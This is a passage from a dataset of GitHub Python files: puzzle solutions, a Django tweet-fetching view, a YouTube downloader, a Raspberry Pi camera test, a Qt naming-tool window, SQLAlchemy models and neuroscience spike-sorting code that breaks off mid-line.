Disc(3, 0),\n Disc(7, 2),\n Disc(19, 17),\n Disc(11, 0) # This is new for part 2\n]\n\n\nif __name__ == '__main__':\n print(\"Starting Day 15-1/2\")\n\n # For this we can just start at a certain time, check where each disc will be at each following second and see if\n # they all end up being zero using modulo math\n start_time = 0\n got_through = False\n while not got_through:\n got_through = True\n time = start_time + 1\n for index in range(len(discs)):\n position = (discs[index].current + time + index) % discs[index].positions\n if position != 0:\n got_through = False\n break\n\n if not got_through:\n start_time += 1\n\n # Print out answer\n print(\"The first start time that works is {0!s}\".format(start_time))\n","repo_name":"theknoxinator/AoC","sub_path":"2016/Day15/day15-1.py","file_name":"day15-1.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16419242353","text":"import pickle\nfrom django.http import JsonResponse, HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.decorators import api_view\nimport numpy as np\nimport ML.queries as query\nimport ML.search_api as search_api\n\n# Create your views here.\n\n\n@api_view(['GET', 'POST'])\n@csrf_exempt\ndef fetchTweets(request):\n if request.method == 'GET':\n return HttpResponse('

it was a get

')\n elif request.method == 'POST':\n print(request.data)\n data = []\n labels = []\n tweetContent = {}\n tweet_data = None\n if request.data['keyword'] == 'general':\n tweet_data = search_api.hit_search_api(query.general, 10)\n elif request.data['keyword'] == 'immediate':\n tweet_data = search_api.hit_search_api(query.immediate, 10)\n elif request.data['keyword'] == 'twittersos':\n tweet_data, labels = search_api.run_model_on_search(\n query.twittersos, 10)\n for index, tweet in enumerate(tweet_data):\n tweetContent[\"tweet.id\"] = tweet.id\n tweetContent[\"tweet.text\"] = tweet.text\n tweetContent[\"tweet.created_at\"] = tweet.created_at\n tweetContent[\"tweet.user.name\"] = tweet.user.name\n tweetContent[\"tweet.user.profile_image_url_https\"] = tweet.user.profile_image_url_https\n tweetContent[\"tweet.user.screen_name\"] = tweet.user.screen_name\n if len(labels) > 1:\n tweetContent[\"status\"].append(label[index])\n data.append(tweetContent)\n return JsonResponse(data, safe=False)\n","repo_name":"Mugunthanraju/Emergency-Tweets","sub_path":"emergencyTweets/tweets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27267826743","text":"from pytube import YouTube\r\nfrom sys import argv\r\n\r\nlink=argv[1]\r\nyt=YouTube(link)\r\n\r\nprint(\"Title: \",yt.title)\r\n\r\nprint(\"Views:\" , yt.views)\r\n\r\nyd= yt.streams.get_highest_resolution()\r\n\r\nyd.download(\"C:/Users/murabıt/Desktop/ytDownload\")\r\n\r\n#in windows you need to type python ytDownloader.py \"youtube link\"\r\n","repo_name":"dogamur/python_projects","sub_path":"ytDownloader.py","file_name":"ytDownloader.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23422899581","text":"rate = 2.0\n\nfile_input = open('CookieClickerAlpha_input')\nfile_output = open('CookieClickerAlpha_output', 'w')\n\ninput = file_input.readline\nprint = file_output.write\n\nT = int(input())\n\n# Rate as a function of i farms\ndef R(F, i):\n\treturn F*i + rate\n\n# Time needed to aquire the ith farm\ndef t(C, F, i):\n\treturn C/R(F, i - 1) # Rate when we own i - 1 farms\n\n# Time taken to reach X based on number of farms we buy\ndef total_time(C, F, X, n):\n\ttime = 0.0\n\tfor i in range(1, n + 1):\n\t\ttime += t(C, F, i)\n\treturn time + X/R(F, n) # Rate after aquiring i farms = R(i)\n\nfor i in range(T):\n\tC, F, X = list(map(float, input().split()))\n\tnFarms = 0\n\tlastTime = float('inf') # Infinite time\n\twhile(True):\n\t\ttime = total_time(C, F, X, nFarms)\n\t\tif time > lastTime:\n\t\t\tbreak\n\t\tnFarms += 1\n\t\tlastTime = time\n\tprint('Case #' + str(i + 1) + ': ' + str(lastTime) + '\\n')\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/1772.py","file_name":"1772.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5130264616","text":"import picamera\nfrom time import sleep\n\ncamera = picamera.PiCamera()\ncamera.resolution = (1024,768)\ncamera.brightness = 60\ncamera.start_recording(\"/home/ameya/Documents/demo.h264\")\ncamera.wait_recording(5)\ncamera.stop_recording()\ncamera.close()\nprint(\"goodbye\")\n\n","repo_name":"dangercomix07/Airdrop-Flipkart-Robotics-Grid-challenge","sub_path":"camera_testing.py","file_name":"camera_testing.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25266084891","text":"import os\nfrom functools import partial\nfrom glob import glob\n\nimport Qt.QtCore as QtCore\nimport Qt.QtGui as QtGui\nimport Qt.QtWidgets as QtWidgets\n\nimport nomenclate.settings as settings\nimport nomenclateUI.components.gui_save as gui_save\nimport nomenclateUI.instance_handler as instance_handler\nimport nomenclateUI.object_list as object_list\nimport nomenclateUI.utils as utils\nimport nomenclateUI.components.default as default\nimport nomenclateUI.platforms as platforms\n\nMODULE_LOGGER_LEVEL_OVERRIDE = settings.INFO\n\n\nclass UISetting(object):\n def __init__(self, default_value=None):\n self.default_value = default_value\n self.value = default_value\n\n @property\n def is_default(self):\n return self.default == self.value\n\n @property\n def default(self):\n return self.default\n\n def get(self):\n return self.value\n\n def set_default(self):\n self.value = self.default\n\n def set(self, value):\n self.value = value\n\n\nclass MainDialog(default.DefaultWindow, utils.Cacheable):\n LOG = settings.get_module_logger(__name__, module_override_level=MODULE_LOGGER_LEVEL_OVERRIDE)\n\n file_saved = QtCore.Signal()\n dropped_files = QtCore.Signal(list)\n update_stylesheet = QtCore.Signal()\n update_color_coded = QtCore.Signal(str, list, bool)\n\n NAME = 'Nomenclate'\n WIDTH = 800\n HEIGHT = 600\n\n DEFAULT_MODIFIER = 'Shift'\n DEFAULT_QSS = 'default.qss'\n DARK_TEXT_QSS = 'text-on-light.qss'\n LIGHT_TEXT_QSS = 'text-on-dark.qss'\n MAIN_QSS = 'dark-too-cool.qss'\n QSS_GLOB = '*.qss'\n\n default_css_cache = None\n\n dark = UISetting(True)\n color_coded = UISetting(True)\n last_action_cache = None\n current_stylesheet = ''\n\n format_history = []\n\n def __init__(self, *args, **kwargs):\n super(MainDialog, self).__init__(*args, **kwargs)\n self.file_menu = None\n self.edit_menu = None\n self.view_menu = None\n self.format_menu = None\n self.presets_menu = None\n self.presets_list_menu = None\n\n self.add_fonts()\n self.setup_menubar()\n self.populate_presets()\n self.load_state()\n self.update_stylesheet.emit()\n QtWidgets.QApplication.instance().installEventFilter(self)\n\n @property\n def focused_widget(self):\n return QtWidgets.QApplication.focusWidget()\n\n @property\n def default_stylesheet(self):\n return self.get_stylesheet_qss(self.DEFAULT_QSS)\n\n @property\n def text_stylesheet(self):\n text_stylesheet = self.LIGHT_TEXT_QSS if self.dark.get() else self.DARK_TEXT_QSS\n return self.get_stylesheet_qss(text_stylesheet)\n\n def combined_stylesheet(self):\n return self.current_stylesheet + self.default_stylesheet + self.text_stylesheet\n\n def create_controls(self):\n main_widget = self\n if isinstance(self, QtWidgets.QMainWindow):\n self.setCentralWidget(QtWidgets.QWidget())\n main_widget = self.centralWidget()\n\n self.layout_main = QtWidgets.QVBoxLayout(main_widget)\n self.menu_bar = QtWidgets.QMenuBar()\n self.wgt_drop_area = QtWidgets.QWidget()\n self.wgt_header = QtWidgets.QWidget()\n self.wgt_files = QtWidgets.QFrame()\n self.wgt_stack = QtWidgets.QStackedWidget()\n\n self.header_layout = QtWidgets.QHBoxLayout()\n self.header_label = QtWidgets.QLabel()\n self.files_layout = QtWidgets.QHBoxLayout()\n\n self.instance_handler = instance_handler.InstanceHandlerWidget(parent=self)\n self.object_list = object_list.FileListWidget()\n\n def connect_controls(self):\n self.setLayout(self.layout_main)\n\n self.wgt_header.setLayout(self.header_layout)\n self.header_layout.addWidget(self.header_label)\n\n self.layout_main.addWidget(self.menu_bar)\n self.layout_main.addWidget(self.wgt_header)\n self.layout_main.addWidget(self.instance_handler)\n self.layout_main.addWidget(self.wgt_stack)\n\n self.wgt_stack.addWidget(self.object_list)\n self.wgt_stack.addWidget(self.wgt_drop_area)\n\n self.dropped_files.connect(self.object_list.populate_objects)\n self.dropped_files.connect(lambda: self.wgt_stack.setCurrentIndex(0))\n\n self.object_list.request_name.connect(self.instance_handler.generate_name)\n self.instance_handler.name_generated.connect(self.object_list.set_item_name)\n self.object_list.request_state.connect(self.context_menu_state)\n\n self.instance_handler.format_updated.connect(self.update_format_history)\n self.instance_handler.format_updated.connect(self.object_list.reset_incrementer)\n self.instance_handler.nomenclate_output.connect(self.object_list.get_object_names)\n self.dropped_files.connect(self.object_list.get_object_names)\n\n self.update_stylesheet.connect(self.set_stylesheet)\n self.update_color_coded.connect(self.instance_handler.format_updated)\n self.file_saved.connect(self.populate_presets)\n\n def context_menu_state(self, qpoint, qitem):\n self.object_list.context_menu_for_item(qpoint,\n qitem,\n self.instance_handler.NOM)\n\n def initialize_controls(self):\n font = QtWidgets.QApplication.font()\n font.setStyleStrategy(font.PreferAntialias)\n QtWidgets.QApplication.setFont(font)\n # self.setWindowOpacity(0.96)\n\n self.setFocus(QtCore.Qt.PopupFocusReason)\n self.load_stylesheet(stylesheet=self.MAIN_QSS)\n self.setWindowTitle(self.NAME)\n self.setObjectName('MainFrame')\n self.setAttribute(QtCore.Qt.WA_DeleteOnClose)\n self.setAcceptDrops(True)\n\n self.wgt_stack.setObjectName('Stack')\n self.wgt_header.setObjectName('HeaderWidget')\n self.header_label.setObjectName('HeaderLabel')\n\n self.header_label.setText(self.NAME.upper())\n self.layout_main.setContentsMargins(0, 0, 0, 0)\n self.layout_main.setSpacing(0)\n self.setBaseSize(self.WIDTH, self.HEIGHT)\n self.layout_main.setAlignment(QtCore.Qt.AlignTop)\n self.instance_handler.fold()\n\n def setup_menubar(self):\n self.file_menu = self.menu_bar.addMenu('File')\n self.edit_menu = self.menu_bar.addMenu('Edit')\n self.view_menu = self.menu_bar.addMenu('View')\n self.format_menu = self.edit_menu.addMenu('Previous Formats')\n self.presets_menu = self.create_presets_menu()\n self.presets_list_menu = self.presets_menu.addMenu('User Presets')\n view_action_color_code = self.view_menu.addAction('Color code tokens')\n view_action_color_code.setShortcut('Ctrl+E')\n view_action_color_code.triggered.connect(self.set_color_coded)\n\n view_action_refresh = self.view_menu.addAction('Refresh StyleSheets from Folder')\n view_action_refresh.setShortcut('Ctrl+U')\n view_action_refresh.triggered.connect(lambda: self.run_action(self.populate_qss_styles, None))\n\n view_action = self.view_menu.addAction('Expand/Collapse Tokens')\n view_action.setShortcut('Ctrl+H')\n view_action.triggered.connect(lambda: self.run_action(self.instance_handler.fold, None))\n\n view_action = self.view_menu.addAction('Swap Light/Dark Text')\n view_action.setShortcut('Ctrl+T')\n view_action.triggered.connect(lambda: self.run_action(self.set_color_mode, None))\n\n repeat_action = self.edit_menu.addAction('Repeat last menu action')\n repeat_action.setShortcut('Ctrl+G')\n repeat_action.triggered.connect(self.repeat_last_action)\n\n exit_action = self.file_menu.addAction('Exit and Save')\n exit_action.setShortcut('Ctrl+Q')\n exit_action.triggered.connect(lambda: self.close(True))\n\n exit_no_save_action = self.file_menu.addAction('Exit without saving...')\n exit_no_save_action.setShortcut('Ctrl+%s+Q' % self.DEFAULT_MODIFIER)\n exit_no_save_action.triggered.connect(lambda: self.close(False))\n\n self.populate_qss_styles()\n\n def create_presets_menu(self):\n self.presets_menu = self.menu_bar.addMenu('Presets')\n presets_action_load_from_config = self.presets_menu.addAction('Reload defaults from config.yml')\n presets_action_load_from_config.triggered.connect(self.instance_handler.load_settings_from_config)\n\n edit_action_load_last_format = self.presets_menu.addAction('Clear all fields')\n edit_action_load_last_format.setShortcut('Ctrl+R')\n edit_action_load_last_format.triggered.connect(self.restore_defaults)\n\n edit_action_load_last_format = self.presets_menu.addAction('Load last format')\n edit_action_load_last_format.setShortcut('Ctrl+D')\n edit_action_load_last_format.triggered.connect(lambda: self.load_format(None))\n\n save_action = self.presets_menu.addAction('Save Window Settings')\n save_action.setShortcut('Ctrl+S')\n save_action.triggered.connect(lambda: self.run_action(self.save_state, None, False))\n\n load_action = self.presets_menu.addAction('Reload Current Preset')\n load_action.setShortcut('Ctrl+L')\n load_action.triggered.connect(lambda: self.run_action(self.load_state, None, False))\n return self.presets_menu\n\n def load_format(self, input_format, *args):\n if not self.format_history:\n self.LOG.warning('No format history')\n return\n elif input_format is None:\n # Swap two last formats\n if len(self.format_history) > 1:\n self.format_history = [self.format_history[1], self.format_history[0]]\n\n if len(self.format_history) > 2:\n self.format_history = self.format_history + self.format_history[2:]\n\n input_format = self.format_history[0]\n else:\n self.format_history.remove(input_format)\n self.format_history.insert(0, input_format)\n if input_format != self.instance_handler.input_format.text_utf:\n self.LOG.info('Swapping format %s with current %s' % (input_format,\n self.instance_handler.input_format.text_utf))\n self.instance_handler.input_format.setText(input_format)\n self.refresh_format_history_menu()\n\n def update_format_history(self, format_string, format_order, swapped):\n if not format_string in self.format_history:\n self.format_history.insert(0, format_string)\n self.refresh_format_history_menu()\n\n def refresh_format_history_menu(self):\n self.format_menu.clear()\n for format_history in self.format_history:\n menu_action = self.format_menu.addAction(format_history)\n action = partial(self.run_action, self.load_format, None, format_history)\n menu_action.triggered.connect(action)\n\n def restore_defaults(self):\n gui_save.WidgetState.restore_state(self, defaults=True)\n\n def save_state(self, mode=False, quit_mode=False):\n result = None if not mode else QtWidgets.QFileDialog.getSaveFileName(self, 'Save UI Settings',\n gui_save.NomenclateFileContext.DEFAULT_PRESETS_PATH,\n filter='*.json')\n result = self.process_dialog_result(result)\n gui_save.WidgetState.generate_state(self, fullpath_override=result)\n if not quit_mode:\n self.file_saved.emit()\n\n def load_state(self, mode=False):\n result = None if not mode else QtWidgets.QFileDialog.getOpenFileName(self, 'Load UI Settings',\n gui_save.NomenclateFileContext.DEFAULT_PRESETS_PATH,\n filter='*.json')\n result = self.process_dialog_result(result)\n gui_save.WidgetState.restore_state(self, fullpath_override=result)\n\n @staticmethod\n def process_dialog_result(path):\n if path is None:\n return path\n path, file_filter = path\n if not path:\n return None\n path = os.path.normpath(path)\n ext = file_filter.replace('*', '')\n return path if path.endswith(ext) else path + ext\n\n def run_action(self, action_function, qevent, *args, **kwargs):\n self.LOG.debug('Recording + running action %s with qevent %s and args %s, kwargs %s' % (action_function,\n qevent,\n args,\n kwargs))\n self.last_action_cache = {'function': action_function, 'args': args, 'kwargs': kwargs, 'event': qevent}\n action_function(*args, **kwargs)\n\n def repeat_last_action(self):\n if self.last_action_cache is not None:\n self.last_action_cache['function'](*self.last_action_cache['args'], **self.last_action_cache['kwargs'])\n\n def set_color_coded(self):\n self.color_coded.set(not self.color_coded.get())\n self.update_color_coded.emit(self.instance_handler.NOM.format, self.instance_handler.NOM.format_order, True)\n\n def set_color_mode(self, mode=None):\n if mode:\n self.dark.set(mode)\n else:\n self.dark.set(not self.dark.get())\n self.update_stylesheet.emit()\n\n def populate_presets(self):\n self.presets_list_menu.clear()\n\n self.LOG.info('Found %d presets...populating with %s' % (len(gui_save.WidgetState.list_presets()),\n sorted(gui_save.WidgetState.list_presets())))\n for preset_file in sorted(gui_save.WidgetState.list_presets()):\n menu_action = self.presets_list_menu.addAction(os.path.basename(preset_file))\n menu_action.triggered.connect(partial(self.run_action,\n gui_save.WidgetState.restore_state,\n None,\n self,\n fullpath_override=preset_file))\n self.presets_list_menu.addSeparator()\n self.LOG.debug('Re-adding load/save preset actions...')\n preset_load_action = self.presets_list_menu.addAction(u'Load Preset...')\n preset_load_action.setShortcut('Ctrl+%s+L' % self.DEFAULT_MODIFIER)\n preset_load_action.triggered.connect(lambda: self.run_action(self.load_state, None, True))\n\n preset_save_action = self.presets_list_menu.addAction(u'Save New Preset...')\n preset_save_action.setShortcut('Ctrl+%s+S' % self.DEFAULT_MODIFIER)\n preset_save_action.triggered.connect(lambda: self.run_action(self.save_state, None, True))\n\n def populate_qss_styles(self):\n try:\n self.themes_menu.clear()\n except (RuntimeError, AttributeError):\n self.themes_menu = self.menu_bar.addMenu('Themes')\n\n for qss_style in glob(os.path.join(utils.RESOURCES_PATH, self.QSS_GLOB)):\n file_name = os.path.basename(qss_style)\n style_name = os.path.splitext(file_name)[0]\n\n if file_name not in [self.DARK_TEXT_QSS, self.LIGHT_TEXT_QSS]:\n action_name = style_name.capitalize() if not style_name == 'default' else 'native OS'\n menu_action = self.themes_menu.addAction(action_name)\n menu_action.triggered.connect(\n partial(self.run_action, self.load_stylesheet, None, stylesheet=file_name))\n\n @utils.cache_function\n def get_stylesheet_qss(self, stylesheet):\n file_path = os.path.join(utils.RESOURCES_PATH, stylesheet)\n stylesheet_file = os.path.normpath(file_path)\n return open(stylesheet_file).read() if os.path.isfile(stylesheet_file) else ''\n\n def load_stylesheet(self, btn_event=None, stylesheet=''):\n self.dark.set('dark' in stylesheet)\n qss_data = self.get_stylesheet_qss(stylesheet=stylesheet)\n self.current_stylesheet = qss_data\n self.update_stylesheet.emit()\n\n def set_stylesheet(self):\n self.setStyleSheet(self.combined_stylesheet())\n\n @staticmethod\n def add_fonts():\n for font_file in [os.path.join(utils.FONTS_PATH, path) for path in os.listdir(utils.FONTS_PATH)]:\n QtGui.QFontDatabase.addApplicationFont(font_file)\n\n def next_stack_frame(self, *args):\n current_index = self.wgt_stack.currentIndex()\n next_index = current_index + 1\n if next_index + 1 > self.wgt_stack.count():\n next_index = 0\n self.wgt_stack.setCurrentIndex(next_index)\n\n def dragEnterEvent(self, event):\n if event.mimeData().hasUrls:\n event.accept()\n self.wgt_stack.setCurrentIndex(1)\n else:\n event.ignore()\n\n def dragLeaveEvent(self, event):\n event.accept()\n self.wgt_stack.setCurrentIndex(0)\n\n def dropEvent(self, event):\n if event.mimeData().hasUrls():\n event.setDropAction(QtCore.Qt.CopyAction)\n event.accept()\n self.dropped_files.emit([str(url.toLocalFile()) for url in event.mimeData().urls()])\n\n if utils.get_application_type() == 'Maya':\n if event.mimeData().hasText():\n self.dropped_files.emit(event.mimeData().text().split())\n\n def keyPressEvent(self, QKeyPressEvent):\n # Attempting to use this passthrough fix to prevent taking over maya shortcuts:\n # https://forums.autodesk.com/t5/maya-programming/maya-amp-pyqt-how-to-prevent-trigger-of-shortcut-keys/td-p/4354371\n pass\n\n def mousePressEvent(self, event):\n focused_widget = self.focused_widget\n if isinstance(focused_widget, QtWidgets.QLineEdit):\n focused_widget.clearFocus()\n super(MainDialog, self).mousePressEvent(event)\n\n def close(self, save_state=True):\n try:\n QtWidgets.QApplication.instance().removeEventFilter(self)\n except RuntimeError:\n self.LOG.warning('Failed to remove event filter...')\n\n if save_state:\n self.save_state(quit_mode=True)\n\n platforms.current.close(self)\n\n def closeEvent(self, e):\n self.close()\n super(MainDialog, self).closeEvent(e)\n","repo_name":"AndresMWeber/NomenclateUI","sub_path":"nomenclateUI/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5253003936","text":"from sqlalchemy import Column, String, Integer, Boolean, DateTime\nfrom datetime import datetime\nfrom app import db\n\n\"\"\"\ndb_drop_and_create_all()\n drops the database tables and starts fresh\n can be used to initialize a clean database\n\"\"\"\n\n\ndef db_reset():\n db.drop_all()\n db.create_all()\n\n\ndef setup_db(app, database_path):\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = database_path\n app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n db.app = app\n db.init_app(app)\n db.create_all()\n\n\nclass Album(db.Model):\n id = Column(Integer, primary_key=True)\n name = Column(String(50), index=True, nullable=False)\n url = Column(String(500), nullable=False)\n timestamp = Column(DateTime, index=True, default=datetime.utcnow)\n user_id = Column(String(50))\n last_time_viewed = Column(DateTime, default=datetime.utcnow)\n last_photo_viewed = Column(String(300))\n images = db.relationship(\"Image\", backref=\"album\", lazy=\"dynamic\")\n\n def __repr__(self):\n return \"\".format(\n self.name,\n self.url,\n self.user_id,\n self.last_time_viewed,\n self.last_photo_viewed,\n )\n\n def __init__(self, name, url, user_id=\"ANON\"):\n self.name = name\n self.url = url\n self.user_id = user_id\n\n def insert(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.commit()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def format(self):\n return {\n \"id\": self.id,\n \"name\": self.name,\n \"url\": self.url,\n \"timestamp\": self.timestamp,\n \"user_id\": self.user_id,\n \"images\": self.images,\n }\n\n\nclass Image(db.Model):\n id = Column(Integer, primary_key=True)\n url = Column(String(300), nullable=False)\n timestamp = Column(DateTime, index=True, default=datetime.utcnow)\n viewed = Column(Boolean)\n album_id = Column(Integer, db.ForeignKey(\"album.id\"), nullable=False)\n\n def __repr__(self):\n return \"\".format(self.album_id, self.url, self.viewed)\n\n def __init__(self, url, album_id, viewed=False):\n self.url = url\n self.album_id = album_id\n self.viewed = viewed\n\n def insert(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.commit()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def format(self):\n return {\n \"id\": self.id,\n \"url\": self.url,\n \"timestamp\": self.timestamp,\n \"album_id\": self.album_id,\n \"viewed\": self.viewed,\n }\n","repo_name":"MattiooFR/1pic1day","sub_path":"app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"738465835","text":"import numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Rectangle\nfrom spikesorting_tsne.spikesorting_tsne import constants as ct\nimport pandas as pd\n\n\ndef _get_relevant_channels_with_threshold(threshold, template):\n amplitude = np.nanmax(template) - np.nanmin(template)\n points_over_threshold = np.argwhere(template > (np.nanmax(template) - threshold * amplitude))\n channels_over_threshold = np.unique(points_over_threshold[:, 1])\n return channels_over_threshold\n\n\ndef _get_relevant_channels_over_median_peaks(threshold, template):\n median = np.median(np.nanmin(template, axis=0))\n std = np.std(np.nanmin(template, axis=0))\n points_under_median = np.argwhere(template < (median - threshold*std))\n channels_over_threshold = np.unique(points_under_median[:, 1])\n return channels_over_threshold\n\n\ndef _normalize(L, normalizeFrom=0, normalizeTo=1):\n '''normalize values of a list to make its min = normalizeFrom and its max = normalizeTo'''\n vMax = max(L)\n vMin = min(L)\n return [(x-vMin)*(normalizeTo - normalizeFrom) / (vMax - vMin) for x in L]\n# ------------------\n\n\ndef generate_probe_positions_of_spikes(base_folder, binary_data_filename, number_of_channels_in_binary_file,\n used_spikes_indices=None, position_mult=2.25, threshold=0.1):\n \"\"\"\n Generate positions (x, y coordinates) for each spike on the probe. This function assumes that the spikes were\n generated with the kilosort algorithm so the base_folder holds all the necessary .npy arrays.\n In order for this function to find which channels are the most relevant in each spike it looks into the spike's\n assigned template (a channels x time points array in spike_templates.npy). It then find the minimum points of all\n channels, takes their median and their standard deviation and for each channel creates the difference between the\n minimum and the median. Finally it demarcates the relevant to the template channels by keeping the ones whose\n difference is larger than a number of times (threshold) over the standard deviation.\n It then picks the relevant channels of the spike's raw data, finds the differences between the minimum value\n and the channel's time series median value (over time), orders the channels according to these differences and\n assigns weights between 0 and 1 (0 for a difference of 0, 1 for a maximum difference).\n It finally finds the x, y positions of the selected channels and adds to the position of the largest difference\n channel the weighted average positions of the remaining selected channels\n\n :param base_folder: the folder name into which the kilosort result .npy arrays are\n :type base_folder: string\n :param binary_data_filename: the name of the binary file that holds the raw data that were originally passed to kilosort\n :type binary_data_filename: string\n :param number_of_channels_in_binary_file: How many channels does the binary file have (this is different to the number\n of channels that are set to active in kilosort)\n :type number_of_channels_in_binary_file: int\n :param used_spikes_indices: which of the spikes found by kilosort should be considered.\n :type used_spikes_indices: int[:]\n :param threshold: the number of times the standard deviation should be larger than the difference between a\n channel's minimum and the median of the minima of all channels in order to demarcate the channel as\n relevant to the spike\n\n :type threshold: float\n :return: The position of each spike on the probe, the distance of eac h spike on the probe from the 0, 0 of the\n probe, the indices of the original ordering of the spikes on the new order sorted according to their distance on\n the probe, the distance of each spike on the probe sorted\n :rtype: float32[len(used_spike_indices), 2], float32[len(used_spike_indices)], int[len(used_spike_indices)], float32[len(used_spike_indices)]\n\n \"\"\"\n # Load the required data from the kilosort folder\n channel_map = np.load(os.path.join(base_folder, 'channel_map.npy'))\n active_channel_map = np.squeeze(channel_map, axis=1)\n channel_positions = np.load(os.path.join(base_folder, 'channel_positions.npy'))\n\n spike_templates = np.load(os.path.join(base_folder, ct.SPIKE_TEMPLATES_FILENAME))\n templates = np.load(os.path.join(base_folder, ct.TEMPLATES_FILENAME))\n\n data_raw = np.memmap(os.path.join(base_folder, binary_data_filename),\n dtype=np.int16, mode='r')\n\n number_of_timepoints_in_raw = int(data_raw.shape[0] / number_of_channels_in_binary_file)\n data_raw_kilosorted = np.reshape(data_raw, (number_of_channels_in_binary_file, number_of_timepoints_in_raw), order='F')\n\n spike_times = np.squeeze(np.load(os.path.join(base_folder, ct.SPIKE_TIMES_FILENAME)).astype(np.int))\n\n time_points = 50\n if used_spikes_indices is None:\n used_spikes_indices = np.arange(0, len(spike_times))\n\n # Run the loop over all spikes to get the positions\n counter = 0\n weighted_average_postions = np.empty((len(used_spikes_indices), 2))\n spike_distance_on_probe = np.empty(len(used_spikes_indices))\n for spike_index in np.arange(0, len(used_spikes_indices)):\n spike_raw_data = data_raw_kilosorted[active_channel_map,\n (spike_times[used_spikes_indices[spike_index]]-time_points):\n (spike_times[used_spikes_indices[spike_index]]+time_points)]\n template = templates[spike_templates[used_spikes_indices[spike_index]], :, :].squeeze()\n relevant_channels = _get_relevant_channels_over_median_peaks(threshold, template)\n\n spike_raw_data_median_over_time = np.median(spike_raw_data, axis=1)\n peaks_to_median = spike_raw_data_median_over_time - spike_raw_data.min(axis=1)\n peaks_to_median = peaks_to_median[relevant_channels]\n\n relevant_channels_sorted = [v for (k, v) in sorted(zip(peaks_to_median, relevant_channels), reverse=True)]\n\n peaks_to_median_sorted = sorted(peaks_to_median, reverse=True)\n peaks_to_median_sorted.append(np.median(spike_raw_data_median_over_time[relevant_channels]))\n\n weights = _normalize(peaks_to_median_sorted)[:-1]\n relevant_channels_positions = channel_positions[relevant_channels_sorted]\n\n pos_x = relevant_channels_positions[0, 0]\n pos_y = relevant_channels_positions[0, 1]\n\n new_pos_x = pos_x - np.mean(((pos_x - relevant_channels_positions[:, 0]) * weights)[1:])\n new_pos_y = pos_y - np.mean(((pos_y - relevant_channels_positions[:, 1]) * weights)[1:])\n weighted_average_postions[spike_index, :] = [new_pos_x, new_pos_y]\n spike_distance_on_probe[spike_index] = np.sqrt(np.power(new_pos_x, 2) + np.power(new_pos_y, 2))\n\n counter += 1\n if counter % 5000 == 0:\n print('Completed ' + str(counter) + ' spikes')\n weighted_average_postions = weighted_average_postions * position_mult\n\n # sort according to position on probe\n spike_indices_sorted_by_probe_distance = np.array([b[0] for b in sorted(enumerate(spike_distance_on_probe),\n key=lambda dist: dist[1])])\n spike_distances_on_probe_sorted = np.array([b[1] for b in sorted(enumerate(spike_distance_on_probe),\n key=lambda dist: dist[1])])\n\n np.save(os.path.join(base_folder, ct.WEIGHTED_SPIKE_POSITIONS_FILENAME), weighted_average_postions)\n\n return weighted_average_postions, spike_distance_on_probe, \\\n spike_indices_sorted_by_probe_distance, spike_distances_on_probe_sorted\n\n\ndef generate_probe_positions_of_templates(base_folder, threshold=0.1, new_templates_array=None):\n \"\"\"\n Generate positions (x, y coordinates) for each template found by kilosort on the probe or passed to it by the\n new_templates_array.\n This function assumes that the base_folder holds all the necessary .npy arrays.\n\n If no new_templates_array is passed it will look for the templates.npy file (created by kilosort) which is the\n average of all spikes for each template (so a (templates x time x channels) data cube). It will also try to find the\n file template_marking.npy which is produced after cleaning using the spikesort_tsne_guis.clean_kilosort_templates\n GUI. If this is found only the non noise templates will have their position evaluated. If not found all templates\n will be considered.\n\n If a new_templates_array is passed (a data cube of either (templates x time x channels) or (templates x channels x time)\n dimensions) then this will be used to calculate the positions.\n\n In order for this function to find which channels are the most relevant in each template it looks into the\n template (a (channels x time) array). It then find the minimum points of all\n channels, takes their median and their standard deviation and for each channel creates the difference between the\n minimum and the median. Finally it demarcates the relevant to the template channels by keeping the ones whose\n difference is larger than a number of times (threshold) over the standard deviation.\n It then picks the relevant channels of the spike's raw data, finds the differences between the minimum value\n and the channel's time series median value (over time), orders the channels according to these differences and\n assigns weights between 0 and 1 (0 for a difference of 0, 1 for a maximum difference).\n It finally finds the x, y positions of the selected channels and adds to the position of the largest difference\n channel the weighted average positions of the remaining selected channels\n\n :param base_folder: the folder name into which the kilosort result .npy arrays are\n :type base_folder: string\n :param threshold: the number of times the standard deviation should be larger than the difference between a\n channel's minimum and the median of the minima of all channels in order to demarcate the channel asvrelevant to the\n spike\n\n :type threshold: float\n :param new_templates_array: an array that is the average over spikes of all templates\n :type new_templates_array: float32[templates x channels x time]\n :return: weighted_average_postions : the positions of the templates on the probe\n :rtype: weighted_average_postions : float32[len(used_spike_indices) x 2]\n\n \"\"\"\n # Load the required data from the kilosort folder\n channel_positions = np.load(os.path.join(base_folder, 'channel_positions.npy'))\n if new_templates_array is None:\n try:\n templates = np.load(os.path.join(base_folder, ct.TEMPLATES_FILENAME))\n except FileNotFoundError:\n exit('No new_templates_array passed and no templates.npy found in folder')\n try:\n template_markings = 